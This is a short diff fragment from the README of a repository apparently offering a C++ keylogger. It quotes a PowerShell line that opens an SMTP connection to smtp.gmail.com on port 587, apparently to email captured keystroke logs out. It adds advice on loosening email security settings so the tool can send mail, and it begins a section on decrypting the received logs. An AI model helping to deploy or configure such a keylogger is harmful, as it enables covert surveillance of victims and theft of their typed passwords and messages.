htmercury/Cpp-Keylogger/README.md

 ```
 line 39: "           $Client = New-Object Net.Mail.SmtpClient($Srv, 587) #587 port for smtp.gmail.com SSL\r\n "
 ```

+### Configuring Other Emails
+Look up permissions respectively for your source email that allow less secure apps to access that source email.

 ## Decrypting the log files
 Follow these steps to decrypt any received log files